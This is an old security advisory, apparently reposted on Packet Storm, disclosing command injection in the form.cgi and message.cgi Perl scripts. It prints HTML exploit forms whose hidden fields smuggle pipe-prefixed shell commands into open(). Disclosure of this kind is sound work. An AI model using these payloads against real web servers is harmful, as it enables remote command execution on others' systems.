SUID Advisory #6 - form.cgi and message.cgi. Anyone can execute any command on the remote system with the priveleges of the web server.
7218fd9d54aa6eeff4bbbbe4da3df325b9a0677e5cf227fce0be65494e9e7c7fsuid@suid.kg - mini advisory - Cliff's Form Mailer and Message board CGIs
Software: form.cgi and message.cgi
URL: http://www.shavenferret.com/scripts/form/
URL: http://www.shavenferret.com/scripts/message/
Version: Version 1.0
Platforms: Unix
Type: Input validation problem
Summary:
Anyone can execute any command on the remote system with
the priveleges of the web server.
Vulnerability:
The perl code does no input validation and performs an
open() on a user supplied input.
Exploits:
(1) form.cgi
Build a HTML form resembling:
<form action=/cgi-bin/form.cgi method=post>
<!-- heres the little sucker -->
<input type=hidden name=response value="| <cmd to exec>">
<input type=hidden name=email value="suid@suid.edu">
<input type=hidden name=name value="name">
<input type=hidden name=subject value=x>
<input type=submit>
</form>
(2) message.cgi
<form action=/cgi-bin/message.cgi method=post>
<input type="hidden" name="name" value="X">
<input type="hidden" name="email" value="X@X.X">
<input type="hidden" name="subject" value="X">
<input type="hidden" name="body" value="X">
<input type="hidden" name="song" value="">
<input type="hidden" name="icon" value="X">
<input type="hidden" name="email_reply" value="no">
<input type="hidden" name="history" value="">
<!-- here tis -->
<input type="hidden" name="forum"
value=" | <command goes here> |">
<!-- hmm -->
<input type="hidden" name="required" value="0">
<input type="hidden" name="reply" value="no">
<input type="hidden" name="action" value="new_message">
<input type="submit">
</form>
Of course you could simply send this in a POST request directly
to the web server. Whatever.
http://www.suid.edu/advisories/006.txt
EOF
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed